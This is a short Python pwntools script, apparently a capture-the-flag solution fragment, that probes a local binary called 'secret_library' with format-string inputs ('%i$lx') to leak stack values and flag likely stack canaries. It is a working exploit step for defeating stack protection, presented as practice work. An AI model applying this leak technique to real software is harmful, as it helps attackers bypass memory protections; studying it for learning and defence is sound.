18 lines
399 B
Python
18 lines
399 B
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
import re
|
|
|
|
elf = context.binary = ELF("./secret_library", checksec=False)
|
|
|
|
context.log_level='warn'
|
|
for i in range(35):
|
|
p = process(elf.path)
|
|
p.recvline()
|
|
p.sendline(f"%{i}$lx")
|
|
val = p.recvline().split(b",")[1].strip()
|
|
if( val[-2:] == b"00"):
|
|
print(f"Possible canary: {val} at position: {i}")
|
|
p.shutdown()
|
|
|
|
#p.interactive()
|